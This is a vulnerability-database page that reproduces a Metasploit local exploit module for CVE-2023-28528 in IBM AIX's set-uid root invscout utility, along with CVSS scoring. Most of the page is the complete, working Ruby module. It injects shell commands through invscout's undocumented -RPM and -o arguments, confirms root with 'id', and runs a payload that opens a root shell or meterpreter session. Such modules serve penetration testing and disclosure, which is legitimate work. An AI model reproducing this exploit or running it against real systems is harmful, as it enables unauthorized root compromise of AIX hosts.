Lucene search

Tim Brown, bcoles <[email protected]>MSF:EXPLOIT-AIX-LOCAL-INVSCOUT_RPM_PRIV_ESC-

HistoryMay 17, 2023 - 10:17 a.m.

invscout RPM Privilege Escalation

2023-05-1710:17:55

Tim Brown, bcoles <[email protected]>

www.rapid7.com

164

metasploit

local

command injection

ibm aix

privilege escalation

vulnerability

rpm

root privileges

cve-2023-28528

talos intelligence

unix

aix

CVSS3

8.4

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

JSON

This module exploits a command injection vulnerability in IBM AIX invscout set-uid root utility present in AIX 7.2 and earlier. The undocumented -rpm argument can be used to install an RPM file; and the undocumented -o argument passes arguments to the rpm utility without validation, leading to command injection with effective-uid root privileges. This module has been tested successfully on AIX 7.2.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'invscout RPM Privilege Escalation',
        'Description' => %q{
          This module exploits a command injection vulnerability in IBM AIX
          invscout set-uid root utility present in AIX 7.2 and earlier.

          The undocumented -rpm argument can be used to install an RPM file;
          and the undocumented -o argument passes arguments to the rpm utility
          without validation, leading to command injection with effective-uid
          root privileges.

          This module has been tested successfully on AIX 7.2.
        },
        'Author' => [
          'Tim Brown', # Discovery and PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['CVE', '2023-28528'],
          ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],
        ],
        'Platform' => %w[unix aix],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'BadChars' => "\x00\x0a\x0d\x22",
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic telnet openssl'
          }
        },
        'DefaultOptions' => {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork' => true
        },
        'SessionTypes' => %w[shell meterpreter],
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-04-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])
    ])
  end

  def invscout_path
    datastore['INVSCOUT_PATH']
  end

  def check
    return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)

    res = execute_command('id')
    id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s

    return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')

    CheckCode::Vulnerable("Output: #{id}")
  end

  def execute_command(cmd, _opts = {})
    rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"
    rpm_args = "; #{cmd}; echo "
    res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")
    vprint_line(res) unless res.blank?
    res
  end

  def exploit
    execute_command(payload.encoded)
  end
end